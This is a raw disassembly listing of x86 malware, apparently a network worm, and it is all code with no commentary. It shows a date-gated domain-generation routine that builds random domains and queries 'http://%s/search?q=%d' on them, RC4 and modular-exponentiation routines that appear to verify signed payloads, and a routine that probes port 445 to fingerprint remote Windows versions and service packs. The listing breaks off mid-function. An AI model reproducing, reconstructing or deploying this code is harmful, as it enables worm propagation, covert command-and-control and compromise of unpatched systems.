; Attributes: bp-based frame
; DWORD __stdcall sub_9AEE25(LPVOID)
sub_9AEE25 proc near ; DATA XREF: sub_9AEE7C+32�o
szUrl = byte ptr -80h
var_1 = byte ptr -1
Memory = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80h
push dword_9BAF78
lea eax, [ebp+szUrl]
push [ebp+Memory]
push offset aHttpSSearch?qD ; "http://%s/search?q=%d"
push 80h ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+szUrl]
push eax ; lpszUrl
mov [ebp+var_1], 0
call sub_9AEA8D
add esp, 18h
test eax, eax
jz short loc_9AEE6C
push 1 ; Value
push offset dword_9BB2CC ; Target
call InterlockedExchange
loc_9AEE6C: ; CODE XREF: sub_9AEE25+38�j
push [ebp+Memory] ; Memory
call free
pop ecx
xor eax, eax
leave
retn 4
sub_9AEE25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AEE7C(LPVOID)
sub_9AEE7C proc near ; DATA XREF: sub_9AEECE+161�o
ThreadId = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+ThreadId]
push esi ; name
call gethostbyname
test eax, eax
jz short loc_9AEEC4
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax] ; in
call inet_ntoa
test eax, eax
jz short loc_9AEEC4
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push 0 ; dwCreationFlags
push eax ; Src
call _strdup
pop ecx
push eax ; lpParameter
push offset sub_9AEE25 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
loc_9AEEC4: ; CODE XREF: sub_9AEE7C+10�j
; sub_9AEE7C+21�j
mov byte ptr [esi], 0
xor eax, eax
pop esi
pop ebp
retn 4
sub_9AEE7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AEECE proc near ; CODE XREF: StartAddress+1CE�p
lpParameter = dword ptr -488h
var_A0 = dword ptr -0A0h
Handles = dword ptr -78h
var_50 = dword ptr -50h
ThreadId = dword ptr -4Ch
var_48 = dword ptr -48h
SystemTime = _SYSTEMTIME ptr -44h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 478h
push offset stru_9A4978
call __SEH_prolog
push 0Ah
pop eax
cmp eax, dword_9BAE64
sbb esi, esi
and esi, 9
inc esi
mov [ebp+var_2C], esi
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call GetSystemTime
cmp [ebp+SystemTime.wYear], 7D9h
ja short loc_9AEF17
jnz loc_9AF0E6
cmp [ebp+SystemTime.wMonth], 1
jb loc_9AF0E6
loc_9AEF17: ; CODE XREF: sub_9AEECE+36�j
call sub_9AC50B
call sub_9AEC85
mov dword_9BB2CC, edi
loc_9AEF27: ; CODE XREF: sub_9AEECE+DC�j
mov [ebp+var_1C], edi
mov ebx, 0FAh
cmp edi, ebx
jnb short loc_9AEFAF
push 20h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
mov [ebp+edi*4+lpParameter], ebx
call sub_9AED54
cdq
push 4
pop ecx
idiv ecx
mov esi, edx
add esi, 8
mov [ebp+var_34], esi
mov [ebp+var_48], ebx
and [ebp+var_28], 0
loc_9AEF60: ; CODE XREF: sub_9AEECE+B5�j
cmp [ebp+var_28], esi
jnb short loc_9AEF85
call sub_9AED54
push eax ; X
call labs
pop ecx
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov eax, [ebp+var_28]
mov [eax+ebx], dl
inc [ebp+var_28]
jmp short loc_9AEF60
; ---------------------------------------------------------------------------
loc_9AEF85: ; CODE XREF: sub_9AEECE+95�j
mov byte ptr [ebx+esi], 0
call sub_9AED54
and eax, 7
push off_9BAD70[eax*4] ; Source
push [ebp+edi*4+lpParameter] ; Dest
call strcat
pop ecx
pop ecx
inc edi
mov esi, [ebp+var_2C]
jmp loc_9AEF27
; ---------------------------------------------------------------------------
loc_9AEFAF: ; CODE XREF: sub_9AEECE+63�j
mov [ebp+var_30], 1
loc_9AEFB6: ; CODE XREF: sub_9AEECE+1E5�j
; sub_9AEECE+1EF�j
xor edi, edi
cmp [ebp+var_30], edi
jz loc_9AF0C2
cmp dword_9BB2CC, edi
jnz loc_9AF0C2
loc_9AEFCD: ; CODE XREF: sub_9AEECE+17D�j
mov [ebp+var_1C], edi
cmp edi, esi
jnb short loc_9AF052
loc_9AEFD4: ; CODE XREF: sub_9AEECE+139�j
; sub_9AEECE+151�j
call rand
cdq
mov ecx, ebx
idiv ecx
mov esi, edx
mov [ebp+var_50], esi
xor eax, eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
loc_9AEFEC: ; CODE XREF: sub_9AEECE+182�j
cmp [ebp+var_20], edi
jnb short loc_9AF004
mov ecx, [ebp+var_20]
cmp [ebp+ecx*4+var_A0], esi
jnz short loc_9AF04D
mov [ebp+var_24], 1
loc_9AF004: ; CODE XREF: sub_9AEECE+121�j
cmp [ebp+var_24], eax
jnz short loc_9AEFD4
mov ecx, [ebp+esi*4+lpParameter]
cmp byte ptr [ecx], 0
jnz short loc_9AF01C
mov [ebp+var_24], 1
loc_9AF01C: ; CODE XREF: sub_9AEECE+145�j
cmp [ebp+var_24], eax
jnz short loc_9AEFD4
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor eax, eax
push eax ; dwCreationFlags
push [ebp+esi*4+lpParameter] ; lpParameter
push offset sub_9AEE7C ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call CreateThread
mov [ebp+edi*4+Handles], eax
mov [ebp+edi*4+var_A0], esi
inc edi
mov esi, [ebp+var_2C]
jmp short loc_9AEFCD
; ---------------------------------------------------------------------------
loc_9AF04D: ; CODE XREF: sub_9AEECE+12D�j
inc [ebp+var_20]
jmp short loc_9AEFEC
; ---------------------------------------------------------------------------
loc_9AF052: ; CODE XREF: sub_9AEECE+104�j
push 7530h ; dwMilliseconds
push 1 ; bWaitAll
lea eax, [ebp+Handles]
push eax ; lpHandles
push esi ; nCount
call WaitForMultipleObjects
and [ebp+var_1C], 0
loc_9AF068: ; CODE XREF: sub_9AEECE+1BE�j
cmp [ebp+var_1C], esi
jnb short loc_9AF08E
mov esi, [ebp+var_1C]
lea esi, [ebp+esi*4+Handles]
push 0 ; dwExitCode
push dword ptr [esi] ; hThread
call TerminateThread
push dword ptr [esi] ; hObject
call CloseHandle
inc [ebp+var_1C]
mov esi, [ebp+var_2C]
jmp short loc_9AF068
; ---------------------------------------------------------------------------
loc_9AF08E: ; CODE XREF: sub_9AEECE+19D�j
push 1388h ; dwMilliseconds
call Sleep
xor eax, eax
loc_9AF09B: ; CODE XREF: sub_9AEECE+1E1�j
mov [ebp+var_1C], eax
cmp eax, ebx
jnb short loc_9AF0B9
mov ecx, [ebp+eax*4+lpParameter]
cmp byte ptr [ecx], 0
jnz short loc_9AF0B1
inc eax
jmp short loc_9AF09B
; ---------------------------------------------------------------------------
loc_9AF0B1: ; CODE XREF: sub_9AEECE+1DE�j
cmp eax, ebx
jb loc_9AEFB6
loc_9AF0B9: ; CODE XREF: sub_9AEECE+1D2�j
and [ebp+var_30], 0
jmp loc_9AEFB6
; ---------------------------------------------------------------------------
loc_9AF0C2: ; CODE XREF: sub_9AEECE+ED�j
; sub_9AEECE+F9�j
mov [ebp+var_1C], edi
loc_9AF0C5: ; CODE XREF: sub_9AEECE+20F�j
cmp [ebp+var_1C], ebx
jnb short loc_9AF0E6
mov eax, [ebp+var_1C]
push [ebp+eax*4+lpParameter] ; hMem
call GlobalFree
inc [ebp+var_1C]
jmp short loc_9AF0C5
; ---------------------------------------------------------------------------
loc_9AF0DF: ; DATA XREF: .text:stru_9A4978�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AF0E3: ; DATA XREF: .text:stru_9A4978�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AF0E6: ; CODE XREF: sub_9AEECE+38�j
; sub_9AEECE+43�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9AEECE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF0F0 proc near ; CODE XREF: sub_9AF1A2+16�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
mov [eax], edx
mov [eax+4], edx
xor ecx, ecx
loc_9AF0FF: ; CODE XREF: sub_9AF0F0+1A�j
mov [eax+ecx*4+8], ecx
inc ecx
cmp ecx, 100h
jl short loc_9AF0FF
push ebx
push esi
push edi
xor esi, esi
mov [ebp+arg_0], edx
loc_9AF114: ; CODE XREF: sub_9AF0F0+56�j
mov ecx, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov bl, [esi+ebx]
add bl, dl
lea edi, [eax+ecx*4+8]
mov ecx, [edi]
add bl, cl
movzx edx, bl
mov ebx, [eax+edx*4+8]
inc esi
cmp esi, [ebp+arg_8]
mov [edi], ebx
mov [eax+edx*4+8], ecx
jl short loc_9AF13C
xor esi, esi
loc_9AF13C: ; CODE XREF: sub_9AF0F0+48�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 100h
jl short loc_9AF114
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9AF0F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF14D proc near ; CODE XREF: sub_9AF1A2+28�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ebx
mov ebx, [eax]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9AF199
push esi
loc_9AF162: ; CODE XREF: sub_9AF14D+49�j
inc bl
movzx ebx, bl
mov edx, [eax+ebx*4+8]
add cl, dl
movzx ecx, cl
lea esi, [eax+ecx*4+8]
mov [ebp+arg_0], ecx
mov ecx, [esi]
mov [eax+ebx*4+8], ecx
add cl, dl
mov [esi], edx
mov esi, [ebp+arg_4]
movzx ecx, cl
mov cl, [eax+ecx*4+8]
add esi, edi
xor [esi], cl
mov ecx, [ebp+arg_0]
inc edi
cmp edi, [ebp+arg_8]
jl short loc_9AF162
pop esi
loc_9AF199: ; CODE XREF: sub_9AF14D+12�j
pop edi
mov [eax], ebx
mov [eax+4], ecx
pop ebx
pop ebp
retn
sub_9AF14D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF1A2 proc near ; CODE XREF: sub_9AF464+98�p
; sub_9B0216+4C�p ...
var_408 = byte ptr -408h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 408h
push [ebp+arg_C]
lea eax, [ebp+var_408]
push [ebp+arg_8]
push eax
call sub_9AF0F0
push [ebp+arg_4]
lea eax, [ebp+var_408]
push [ebp+arg_0]
push eax
call sub_9AF14D
add esp, 18h
leave
retn
sub_9AF1A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF1D4 proc near ; CODE XREF: sub_9AF22E+3E�p
; sub_9AF22E+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov ecx, 80h
loc_9AF1E5: ; CODE XREF: sub_9AF1D4+1E�j
mov eax, [esi+ecx*4]
mov ebx, [edi+ecx*4]
cmp eax, ebx
jb short loc_9AF1F8
ja short loc_9AF1FF
dec ecx
jns short loc_9AF1E5
xor eax, eax
jmp short loc_9AF204
; ---------------------------------------------------------------------------
loc_9AF1F8: ; CODE XREF: sub_9AF1D4+19�j
mov eax, 0FFFFFFFFh
jmp short loc_9AF204
; ---------------------------------------------------------------------------
loc_9AF1FF: ; CODE XREF: sub_9AF1D4+1B�j
mov eax, 1
loc_9AF204: ; CODE XREF: sub_9AF1D4+22�j
; sub_9AF1D4+29�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9AF1D4 endp
; =============== S U B R O U T I N E =======================================
sub_9AF209 proc near ; CODE XREF: sub_9AF22E+13�p
; sub_9AF2F1+38�p
arg_0 = dword ptr 4
mov eax, 101Fh
push esi
loc_9AF20F: ; CODE XREF: sub_9AF209+1F�j
mov esi, [esp+4+arg_0]
mov edx, eax
shr edx, 5
mov edx, [esi+edx*4]
mov ecx, eax
and ecx, 1Fh
shr edx, cl
test dl, 1
jnz short loc_9AF22C
dec eax
jns short loc_9AF20F
xor eax, eax
loc_9AF22C: ; CODE XREF: sub_9AF209+1C�j
pop esi
retn
sub_9AF209 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AF22E(void *Dst,int,int)
sub_9AF22E proc near ; CODE XREF: sub_9AF2F1+74�p
; sub_9AF2F1+A1�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 204h ; Size
push 0 ; Val
push [ebp+Dst] ; Dst
call memset
push ebx
call sub_9AF209
mov edx, eax
add esp, 10h
test edx, edx
jl loc_9AF2EF
push esi
push edi
loc_9AF255: ; CODE XREF: sub_9AF22E+B9�j
mov edi, [ebp+Dst]
xor eax, eax
mov ecx, 81h
loc_9AF25F: ; CODE XREF: sub_9AF22E+36�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_9AF25F
push [ebp+arg_8]
push [ebp+Dst]
call sub_9AF1D4
test eax, eax
pop ecx
pop ecx
jl short loc_9AF290
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9AF284: ; CODE XREF: sub_9AF22E+60�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AF284
loc_9AF290: ; CODE XREF: sub_9AF22E+47�j
mov eax, edx
shr eax, 5
mov eax, [ebx+eax*4]
mov ecx, edx
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9AF2E6
mov edi, [ebp+Dst]
mov esi, [ebp+arg_4]
mov ecx, 81h
xor eax, eax
loc_9AF2B0: ; CODE XREF: sub_9AF22E+8C�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AF2B0
push [ebp+arg_8]
push [ebp+Dst]
call sub_9AF1D4
test eax, eax
pop ecx
pop ecx
jl short loc_9AF2E6
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9AF2DA: ; CODE XREF: sub_9AF22E+B6�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AF2DA
loc_9AF2E6: ; CODE XREF: sub_9AF22E+73�j
; sub_9AF22E+9D�j
dec edx
jns loc_9AF255
pop edi
pop esi
loc_9AF2EF: ; CODE XREF: sub_9AF22E+1F�j
pop ebp
retn
sub_9AF22E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF2F1 proc near ; CODE XREF: sub_9AF3B9+89�p
var_410 = byte ptr -410h
Dst = byte ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 410h
push esi
push 200h ; Size
lea eax, [edi+4]
push 0 ; Val
push eax ; Dst
mov dword ptr [edi], 1
call memset
mov esi, 204h
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call memcpy
push [ebp+arg_4]
call sub_9AF209
and [ebp+var_4], 0
add esp, 1Ch
test eax, eax
mov [ebp+var_8], eax
jl short loc_9AF3B6
push ebx
loc_9AF33D: ; CODE XREF: sub_9AF2F1+C2�j
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov eax, ecx
shr eax, 5
mov eax, [edx+eax*4]
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9AF37B
push [ebp+arg_8] ; int
lea eax, [ebp+var_410]
push edi ; int
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_9AF22E
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
push edi ; Dst
call memcpy
add esp, 18h
loc_9AF37B: ; CODE XREF: sub_9AF2F1+61�j
push [ebp+arg_8] ; int
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+var_410]
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_9AF22E
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
mov eax, ebx
push eax ; Dst
call memcpy
add esp, 18h
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jle short loc_9AF33D
pop ebx
loc_9AF3B6: ; CODE XREF: sub_9AF2F1+49�j
pop esi
leave
retn
sub_9AF2F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AF3B9(void *Src,int,int,int)
sub_9AF3B9 proc near ; CODE XREF: sub_9AF464+4F�p
var_810 = byte ptr -810h
var_611 = byte ptr -611h
var_60C = byte ptr -60Ch
var_408 = byte ptr -408h
var_208 = dword ptr -208h
var_204 = dword ptr -204h
Dst = byte ptr -200h
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_4]
push esi
push edi
mov esi, 200h
push esi ; Size
mov [ebp+var_204], eax
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call memset
push 204h ; Size
lea eax, [ebp+var_60C]
push 0 ; Val
push eax ; Dst
call memset
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+var_60C]
push eax ; Dst
call memcpy
mov eax, [ebp+arg_C]
and [ebp+var_208], 0
add esp, 24h
xor ecx, ecx
add eax, 1FFh
loc_9AF418: ; CODE XREF: sub_9AF3B9+6C�j
mov dl, [eax]
mov [ebp+ecx+var_408], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9AF418
lea eax, [ebp+var_60C]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_408]
push eax
lea edi, [ebp+var_810]
call sub_9AF2F1
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_611]
loc_9AF452: ; CODE XREF: sub_9AF3B9+A5�j
mov dl, [eax]
mov edi, [ebp+arg_8]
mov [ecx+edi], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9AF452
pop edi
pop esi
leave
retn
sub_9AF3B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AF464(void *Src,int,int,int,int)
sub_9AF464 proc near ; CODE XREF: sub_9A86E4+3E�p
; sub_9A89A9+52�p ...
Buf1 = byte ptr -400h
var_3FF = byte ptr -3FFh
Dst = byte ptr -3FEh
var_240 = byte ptr -240h
Buf2 = byte ptr -200h
var_80 = byte ptr -80h
var_40 = byte ptr -40h
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
push 1FEh ; Size
lea eax, [ebp+Dst]
push 0FFh ; Val
push eax ; Dst
mov [ebp+Buf1], 0
mov [ebp+var_3FF], 1
call memset
lea eax, [ebp+var_240]
push eax ; Dst
push [ebp+arg_10] ; int
push [ebp+arg_C] ; int
call sub_9B6BB9
push [ebp+arg_8] ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+arg_4] ; int
push [ebp+Src] ; Src
call sub_9AF3B9
push 180h ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
lea eax, [ebp+Buf1]
push eax ; Buf1
call memcmp
add esp, 34h
test eax, eax
jnz short loc_9AF529
push 40h ; Size
lea eax, [ebp+var_40]
push eax ; Buf2
lea eax, [ebp+var_240]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9AF529
push 40h
lea eax, [ebp+var_80]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9AF1A2
lea eax, [ebp+var_40]
push eax ; Dst
push [ebp+arg_10] ; int
push [ebp+arg_C] ; int
call sub_9B6BB9
push 40h ; Size
lea eax, [ebp+var_40]
push eax ; Buf2
lea eax, [ebp+var_80]
push eax ; Buf1
call memcmp
add esp, 28h
neg eax
sbb eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9AF529: ; CODE XREF: sub_9AF464+71�j
; sub_9AF464+8A�j
xor al, al
leave
retn
sub_9AF464 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AF52D(int,u_short netshort)
sub_9AF52D proc near ; CODE XREF: sub_9AAB69+9�p
var_3C = dword ptr -3Ch
s = dword ptr -2Ch
var_28 = dword ptr -28h
len = dword ptr -24h
hMem = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
netshort = word ptr 0Ch
push 1Ch
push offset stru_9A4AD0
call __SEH_prolog
or ebx, 0FFFFFFFFh
mov [ebp+var_1C], ebx
mov [ebp+s], ebx
xor edi, edi
mov [ebp+hMem], edi
mov [ebp+ms_exc.disabled], edi
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket
mov esi, eax
mov [ebp+s], esi
cmp esi, 0FFFFFFFFh
jz loc_9AF790
push 4 ; int
push dword ptr [ebp+netshort] ; netshort
push [ebp+arg_0] ; int
push esi ; fd
call sub_9AC9D5
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_9AF790
cmp [ebp+netshort], 1BDh
jz short loc_9AF5CE
push 7 ; int
push 48h ; int
push offset unk_9A4988 ; int
push esi ; s
call sub_9AC931
add esp, 10h
cmp eax, 48h
jnz loc_9AF790
push 7 ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AC864
add esp, 0Ch
mov [ebp+hMem], eax
cmp eax, edi
jz loc_9AF790
cmp [ebp+len], edi
jz loc_9AF790
push eax ; hMem
call GlobalFree
mov [ebp+hMem], edi
loc_9AF5CE: ; CODE XREF: sub_9AF52D+57�j
push 7
pop edi
push edi ; int
push 33h ; int
push offset dword_9A49D4 ; int
push esi ; s
call sub_9AC931
add esp, 10h
cmp eax, 33h
jnz loc_9AF790
push edi ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AC864
add esp, 0Ch
mov [ebp+hMem], eax
test eax, eax
jz loc_9AF790
cmp [ebp+len], 0
jz loc_9AF790
push eax ; hMem
call GlobalFree
and [ebp+hMem], 0
push edi ; int
push 4Dh ; int
push offset dword_9A4A08 ; int
push esi ; s
call sub_9AC931
add esp, 10h
cmp eax, 4Dh
jnz loc_9AF790
push edi ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AC864
add esp, 0Ch
mov [ebp+hMem], eax
test eax, eax
jz loc_9AF790
mov eax, [ebp+len]
test eax, eax
jz loc_9AF753
loc_9AF657: ; CODE XREF: sub_9AF52D+13E�j
dec eax
mov [ebp+var_28], eax
mov ecx, [ebp+hMem]
test eax, eax
jz loc_9AF790
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AF657
test eax, eax
jz loc_9AF790
loc_9AF675: ; CODE XREF: sub_9AF52D+159�j
dec eax
mov [ebp+var_28], eax
test eax, eax
jz loc_9AF790
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AF675
test eax, eax
jz loc_9AF790
loc_9AF690: ; CODE XREF: sub_9AF52D+174�j
dec eax
mov [ebp+var_28], eax
test eax, eax
jz loc_9AF790
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AF690
test eax, eax
jz loc_9AF790
lea edi, [eax+ecx]
push edi ; SubStr
call _strlwr
mov [esp+3Ch+var_3C], offset aVista ; "vista"
push edi ; Str
mov esi, strstr
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF6FB
push offset aServicePack1 ; "service pack 1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF6E0
push 9
jmp loc_9AF78C
; ---------------------------------------------------------------------------
loc_9AF6E0: ; CODE XREF: sub_9AF52D+1AA�j
push offset aServicePack ; "service pack"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 2
add ebx, 8
jmp loc_9AF78D
; ---------------------------------------------------------------------------
loc_9AF6FB: ; CODE XREF: sub_9AF52D+19C�j
push offset aWindowsServer2 ; "windows server 2003"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF745
push offset aServicePack1 ; "service pack 1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF71B
push 5
jmp short loc_9AF78C
; ---------------------------------------------------------------------------
loc_9AF71B: ; CODE XREF: sub_9AF52D+1E8�j
push offset aServicePack2 ; "service pack 2"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF72D
push 6
jmp short loc_9AF78C
; ---------------------------------------------------------------------------
loc_9AF72D: ; CODE XREF: sub_9AF52D+1FA�j
push offset aServicePack ; "service pack"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 3
add ebx, 4
jmp short loc_9AF78D
; ---------------------------------------------------------------------------
loc_9AF745: ; CODE XREF: sub_9AF52D+1DA�j
push offset aWindows5_1 ; "windows 5.1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF757
loc_9AF753: ; CODE XREF: sub_9AF52D+124�j
push 3
jmp short loc_9AF78C
; ---------------------------------------------------------------------------
loc_9AF757: ; CODE XREF: sub_9AF52D+224�j
push offset aWindows5_0 ; "windows 5.0"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF769
push 2
jmp short loc_9AF78C
; ---------------------------------------------------------------------------
loc_9AF769: ; CODE XREF: sub_9AF52D+236�j
push offset aWindows4_0 ; "windows 4.0"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF77C
xor ebx, ebx
inc ebx
jmp short loc_9AF78D
; ---------------------------------------------------------------------------
loc_9AF77C: ; CODE XREF: sub_9AF52D+248�j
push offset aUnix ; "unix"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AF790
push 0Bh
loc_9AF78C: ; CODE XREF: sub_9AF52D+1AE�j
; sub_9AF52D+1EC�j ...
pop ebx
loc_9AF78D: ; CODE XREF: sub_9AF52D+1C9�j
; sub_9AF52D+216�j ...
mov [ebp+var_1C], ebx
loc_9AF790: ; CODE XREF: sub_9AF52D+31�j
; sub_9AF52D+4B�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AF7A4
; ---------------------------------------------------------------------------
loc_9AF796: ; DATA XREF: .text:stru_9A4AD0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AF79A: ; DATA XREF: .text:stru_9A4AD0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_9AF7A4: ; CODE XREF: sub_9AF52D+267�j
cmp [ebp+hMem], 0
jz short loc_9AF7B3
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AF7B3: ; CODE XREF: sub_9AF52D+27B�j
cmp [ebp+s], 0FFFFFFFFh
jz short loc_9AF7CD
push 1 ; how
push [ebp+s] ; s
call shutdown
push [ebp+s] ; s
call closesocket
loc_9AF7CD: ; CODE XREF: sub_9AF52D+28A�j
mov eax, ebx
call __SEH_epilog
retn
sub_9AF52D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AF7D5(LPVOID)
sub_9AF7D5 proc near ; DATA XREF: sub_9AFD0A+13B�o
var_49C = byte ptr -49Ch
var_29D = byte ptr -29Dh
Buf2 = byte ptr -29Ch
var_9D = byte ptr -9Dh
Str = byte ptr -9Ch
var_5D = byte ptr -5Dh
name = sockaddr ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
netlong = dword ptr -38h
hMem = dword ptr -34h
s = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
len = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 48Ch
push offset stru_9A4BA0
call __SEH_prolog
mov eax, [ebp+arg_0]
mov [ebp+var_44], eax
mov esi, [eax]
mov [ebp+s], esi
mov eax, [eax+4]
mov [ebp+netlong], eax
xor ebx, ebx
mov [ebp+var_40], ebx
mov [ebp+var_28], ebx
mov [ebp+var_1C], ebx
mov [ebp+len], 10h
call sub_9AC50B
mov [ebp+ms_exc.disabled], ebx
lea eax, [ebp+len]
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push esi ; s
call getsockname
cmp eax, 0FFFFFFFFh
jz short loc_9AF829
mov eax, dword ptr [ebp+name.sa_data+2]
mov [ebp+var_40], eax
loc_9AF829: ; CODE XREF: sub_9AF7D5+4C�j
